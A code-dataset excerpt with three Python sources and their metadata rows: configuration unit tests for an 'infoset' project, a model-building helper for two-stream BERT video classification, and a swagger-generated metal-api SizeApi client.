bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.log_level()
# Cleanup files in temp directories
_delete_files(directory)
def test_log_directory(self):
"""Testing method log_directory."""
# Testing log_directory with temp directory
# Set the environmental variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing log_directory with blank key_value(filepath)
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.log_directory()
# Cleanup files in temp directories
_delete_files(directory)
def test_ingest_cache_directory(self):
"""Testing method ingest_cache_directory."""
# Testing ingest_cache_directory with temp directory
# Set the environmental variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing ingest_cache_directory with blank key_value(filepath)
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.ingest_cache_directory()
# Cleanup files in temp directories
_delete_files(directory)
def test_ingest_pool_size(self):
"""Testing method ingest_pool_size."""
# Testing ingest_pool_size with good_dict
# good key and key_value
result = self.config.ingest_pool_size()
self.assertEqual(result, 20)
self.assertEqual(result, self.good_dict['main']['ingest_pool_size'])
def test_bind_port(self):
"""Testing method bind_port."""
# Testing bind_port with good_dictionary
# good key and key_value
result = self.config.bind_port()
self.assertEqual(result, 3000)
self.assertEqual(result, self.good_dict['main']['bind_port'])
# Set the environmental variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing bind_port with blank key and blank key_value
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.bind_port()
# Testing bind_port with good key and blank key_value
key = 'bind_port:'
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
result = config.bind_port()
self.assertEqual(result, 6000)
# Cleanup files in temp directories
_delete_files(directory)
def test_interval(self):
"""Testing method interval."""
# Testing interval with good_dictionary
# good key value and key_value
result = self.config.interval()
self.assertEqual(result, 300)
self.assertEqual(result, self.good_dict['main']['interval'])
# Set the environmental variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing interval with blank key and blank key_value
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.interval()
# Testing interval with blank key_value
key = 'interval:'
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
result = config.interval()
self.assertEqual(result, 300)
# Cleanup files in temp directories
_delete_files(directory)
def test_sqlalchemy_pool_size(self):
"""Testing method sqlalchemy_pool_size."""
# Testing sqlalchemy_pool_size with a good dictionary
# good key and key_value
result = self.config.sqlalchemy_pool_size()
self.assertEqual(result, 10)
self.assertEqual(
result, self.good_dict['main']['sqlalchemy_pool_size'])
# Set the environmental variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing sqlalchemy_pool_size with blank key and blank key_value
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.sqlalchemy_pool_size()
# Testing sqlalchemy_pool_size with good key and blank key_value
key = 'sqlalchemy_pool_size:'
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
result = config.sqlalchemy_pool_size()
self.assertEqual(result, 10)
# Cleanup files in temp directories
_delete_files(directory)
def test_sqlalchemy_max_overflow(self):
"""Testing method sqlalchemy_max_overflow."""
result = self.config.sqlalchemy_max_overflow()
self.assertEqual(result, 10)
self.assertEqual(
result, self.good_dict['main']['sqlalchemy_max_overflow'])
# Set the environmental variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing sqlalchemy_max_overflow with blank key and blank key_value
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.sqlalchemy_max_overflow()
# Testing sqlalchemy_max_overflow with good key and blank key_value
key = 'sqlalchemy_max_overflow:'
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
result = config.sqlalchemy_max_overflow()
self.assertEqual(result, 10)
# Cleanup files in temp directories
_delete_files(directory)
def test_memcached_port(self):
"""Testing method memcached_port."""
# Testing memcached_port with good_dictionary
# good key and key_value
result = self.config.memcached_port()
self.assertEqual(result, 22122)
self.assertEqual(result, self.good_dict['main']['memcached_port'])
# Set the environmental variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing memcached_port with blank key and blank key_value
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.memcached_port()
# Testing memcached_port with good key and blank key_value
key = 'memcached_port:'
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
result = config.memcached_port()
self.assertEqual(result, 11211)
# Cleanup files in temp directories
_delete_files(directory)
def test_memcached_hostname(self):
"""Testing method memcached_hostname."""
result = self.config.memcached_hostname()
self.assertEqual(result, 'localhost')
self.assertEqual(result, self.good_dict['main']['memcached_hostname'])
# Set the environmental variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing memcached_hostname with blank key and blank key_value
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.memcached_hostname()
# Testing memcached_hostname with good key and blank key_value
key = 'memcached_hostname:'
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object defaults to 'localhost'
config = configuration.Config()
result = config.memcached_hostname()
self.assertEqual(result, 'localhost')
# Cleanup files in temp directories
_delete_files(directory)
def test_db_hostname(self):
"""Testing method db_hostname."""
result = self.config.db_hostname()
self.assertEqual(result, 'localhost')
self.assertEqual(result, self.good_dict['main']['db_hostname'])
# Set the environmental variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing db_hostname with blank key and blank key_value
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.db_hostname()
# Testing db_hostname with good key and blank key_value
key = 'db_hostname:'
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.db_hostname()
# Cleanup files in temp directories
_delete_files(directory)
def test_db_username(self):
"""Testing method db_username."""
result = self.config.db_username()
self.assertEqual(result, 'test_infoset')
self.assertEqual(result, self.good_dict['main']['db_username'])
# Set the environmental variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing db_username with blank key and blank key_value
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.db_username()
# Testing db_username with good key and blank key_value
key = 'db_username:'
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.db_username()
# Cleanup files in temp directories
_delete_files(directory)
def test_db_password(self):
"""Testing method db_password."""
result = self.config.db_password()
self.assertEqual(result, 'test_B3bFHgxQfsEy86TN')
self.assertEqual(result, self.good_dict['main']['db_password'])
# Set the environmental variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing db_password with blank key and blank key_value
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.db_password()
# Testing db_password with good key and blank key_value
key = 'db_password:'
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.db_password()
# Cleanup files in temp directories
_delete_files(directory)
def test_db_name(self):
"""Testing method db_name."""
result = self.config.db_name()
self.assertEqual(result, 'test_infoset')
self.assertEqual(result, self.good_dict['main']['db_name'])
# Set the environmental variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing db_name with blank key and blank key_value
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.db_name()
# Testing db_name with good key and blank key_value
key = 'db_name:'
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.db_name()
# Cleanup files in temp directories
_delete_files(directory)
def _delete_files(directory):
"""Delete all files in directory."""
# Verify that directory exists
if os.path.isdir(directory) is False:
return
# Cleanup files in temp directories
filenames = [filename for filename in os.listdir(
directory) if os.path.isfile(
os.path.join(directory, filename))]
# Get the full filepath for the cache file and remove filepath
for filename in filenames:
filepath = os.path.join(directory, filename)
os.remove(filepath)
# Remove directory after files are deleted.
os.rmdir(directory)
if __name__ == '__main__':
# Do the unit test
unittest.main()
| 32.920366 | 78 | 0.626799 | 2,991 | 25,217 | 5.056503 | 0.057506 | 0.042317 | 0.034911 | 0.03425 | 0.824187 | 0.795953 | 0.765009 | 0.72785 | 0.709997 | 0.684078 | 0 | 0.00458 | 0.264028 | 25,217 | 765 | 79 | 32.963399 | 0.810335 | 0.223817 | 0 | 0.705882 | 0 | 0 | 0.109681 | 0.010525 | 0 | 0 | 0 | 0 | 0.111345 | 1 | 0.039916 | false | 0.014706 | 0.014706 | 0 | 0.073529 | 0.002101 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4f9069c0ebafebd55349b41fe5993de03a2640ad | 4,541 | py | Python | two_stream_bert/build.py | bomtorazek/LateTemporalModeling3DCNN | a385c0b7b58116e274bed8b0e5fe6ac978ccb61c | [
"MIT"
] | 3 | 2021-03-12T13:37:27.000Z | 2021-03-29T04:41:00.000Z | two_stream_bert/build.py | bomtorazek/LateTemporalModeling3DCNN | a385c0b7b58116e274bed8b0e5fe6ac978ccb61c | [
"MIT"
] | 3 | 2021-03-17T02:00:29.000Z | 2021-04-01T05:49:54.000Z | two_stream_bert/build.py | bomtorazek/LateTemporalModeling3DCNN | a385c0b7b58116e274bed8b0e5fe6ac978ccb61c | [
"MIT"
] | 1 | 2021-03-12T02:38:19.000Z | 2021-03-12T02:38:19.000Z | from utils.model_path import rgb_3d_model_path_selection
from two_stream_bert import optimization
import models
import torch
def build_model(args):
modality=args.arch.split('_')[0]
if modality == "rgb":
model_path = rgb_3d_model_path_selection(args.arch)
#model_path = os.path.join(modelLocation,'model_best.pth.tar')
elif modality == "flow":
model_path=''
if "3D" in args.arch:
if 'I3D' in args.arch:
model_path='./weights/flow_imagenet.pth'
elif '3D' in args.arch:
model_path='./weights/Flow_Kinetics_64f.pth'
#model_path = os.path.join(modelLocation,'model_best.pth.tar')
elif modality == "both":
model_path=''
if args.dataset=='ucf101':
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=101,length=args.num_seg)
elif args.dataset=='hmdb51':
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=51, length=args.num_seg)
elif args.dataset=='smtV2':
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=174, length=args.num_seg)
elif args.dataset=='window':
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=3, length=args.num_seg)
elif 'cvpr' in args.dataset: # TODO for semi
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=6, length=args.num_seg)
if torch.cuda.device_count() > 1:
model=torch.nn.DataParallel(model)
model = model.cuda()
return model
def build_model_validate(args):
modelLocation="./checkpoint/"+args.dataset+"_"+args.arch+"_split"+str(args.split)
model_path = os.path.join(modelLocation,'model_best.pth.tar')
params = torch.load(model_path)
print(modelLocation)
if args.dataset=='ucf101':
model=models.__dict__[args.arch](modelPath='', num_classes=101,length=args.num_seg)
elif args.dataset=='hmdb51':
model=models.__dict__[args.arch](modelPath='', num_classes=51,length=args.num_seg)
elif args.dataset=='smtV2':
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=174, length=args.num_seg)
elif args.dataset=='window':
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=3, length=args.num_seg)
elif 'cvpr' in args.dataset: # TODO for semi
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=6, length=args.num_seg)
if torch.cuda.device_count() > 1:
model=torch.nn.DataParallel(model)
model.load_state_dict(params['state_dict'])
model.cuda()
model.eval()
return model
def build_model_continue(args):
modelLocation="./checkpoint/"+args.dataset+"_"+args.arch+"_split"+str(args.split)
model_path = os.path.join(modelLocation,'model_best.pth.tar')
params = torch.load(model_path)
print(modelLocation)
if args.dataset=='ucf101':
model=models.__dict__[args.arch](modelPath='', num_classes=101,length=args.num_seg)
elif args.dataset=='hmdb51':
model=models.__dict__[args.arch](modelPath='', num_classes=51,length=args.num_seg)
elif args.dataset=='smtV2':
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=174, length=args.num_seg)
elif args.dataset=='window':
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=3, length=args.num_seg)
elif 'cvpr' in args.dataset: # TODO for semi
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=6, length=args.num_seg)
if torch.cuda.device_count() > 1:
model=torch.nn.DataParallel(model)
model.load_state_dict(params['state_dict'])
model = model.cuda()
optimizer = optimization.get_optimizer(model, args)
optimizer.load_state_dict(params['optimizer'])
startEpoch = params['epoch']
best_acc = params['best_acc1']
return model, startEpoch, optimizer, best_acc
| 43.247619 | 102 | 0.668355 | 616 | 4,541 | 4.657468 | 0.131494 | 0.147438 | 0.078425 | 0.099338 | 0.842802 | 0.810038 | 0.810038 | 0.789125 | 0.789125 | 0.789125 | 0 | 0.016331 | 0.190927 | 4,541 | 104 | 103 | 43.663462 | 0.764562 | 0.036556 | 0 | 0.701149 | 0 | 0 | 0.106178 | 0.013272 | 0 | 0 | 0 | 0.009615 | 0 | 1 | 0.034483 | false | 0 | 0.045977 | 0 | 0.114943 | 0.149425 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
96eb2e8b54ac175633bf1945594806c0e3a08dcf | 22,592 | py | Python | metal_python/api/size_api.py | metal-stack/metal-python | cdf40fa86d2b2944f9818cef1c6723b1eecc506e | [
"MIT"
] | 7 | 2020-12-21T05:24:24.000Z | 2022-02-12T20:55:32.000Z | metal_python/api/size_api.py | metal-stack/metal-python | cdf40fa86d2b2944f9818cef1c6723b1eecc506e | [
"MIT"
] | 6 | 2020-09-16T07:23:34.000Z | 2022-01-18T12:05:30.000Z | metal_python/api/size_api.py | metal-stack/metal-python | cdf40fa86d2b2944f9818cef1c6723b1eecc506e | [
"MIT"
] | null | null | null | # coding: utf-8
"""
metal-api
API to manage and control plane resources like machines, switches, operating system images, machine sizes, networks, IP addresses and more # noqa: E501
OpenAPI spec version: v0.15.7
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from metal_python.api_client import ApiClient
class SizeApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_size(self, body, **kwargs): # noqa: E501
"""create a size. if the given ID already exists a conflict is returned # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_size(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param V1SizeCreateRequest body: (required)
:return: V1SizeResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_size_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_size_with_http_info(body, **kwargs) # noqa: E501
return data
def create_size_with_http_info(self, body, **kwargs): # noqa: E501
"""create a size. if the given ID already exists a conflict is returned # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_size_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param V1SizeCreateRequest body: (required)
:return: V1SizeResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_size" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_size`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['HMAC', 'jwt'] # noqa: E501
return self.api_client.call_api(
'/v1/size', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1SizeResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_size(self, id, **kwargs): # noqa: E501
"""deletes an size and returns the deleted entity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_size(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: identifier of the size (required)
:return: V1SizeResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_size_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_size_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_size_with_http_info(self, id, **kwargs): # noqa: E501
"""deletes an size and returns the deleted entity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_size_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: identifier of the size (required)
:return: V1SizeResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_size" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_size`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['HMAC', 'jwt'] # noqa: E501
return self.api_client.call_api(
'/v1/size/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1SizeResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def find_size(self, id, **kwargs): # noqa: E501
"""get size by id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_size(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: identifier of the size (required)
:return: V1SizeResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.find_size_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.find_size_with_http_info(id, **kwargs) # noqa: E501
return data
def find_size_with_http_info(self, id, **kwargs): # noqa: E501
"""get size by id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_size_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: identifier of the size (required)
:return: V1SizeResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method find_size" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `find_size`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['HMAC', 'jwt'] # noqa: E501
return self.api_client.call_api(
'/v1/size/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1SizeResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def from_hardware(self, body, **kwargs): # noqa: E501
"""Searches all sizes for one to match the given hardwarespecs. If nothing is found, a list of entries is returned which describe the constraint which did not match # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.from_hardware(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param V1MachineHardwareExtended body: (required)
:return: V1SizeMatchingLog
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.from_hardware_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.from_hardware_with_http_info(body, **kwargs) # noqa: E501
return data
def from_hardware_with_http_info(self, body, **kwargs): # noqa: E501
"""Searches all sizes for one to match the given hardwarespecs. If nothing is found, a list of entries is returned which describe the constraint which did not match # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.from_hardware_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param V1MachineHardwareExtended body: (required)
:return: V1SizeMatchingLog
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method from_hardware" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `from_hardware`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
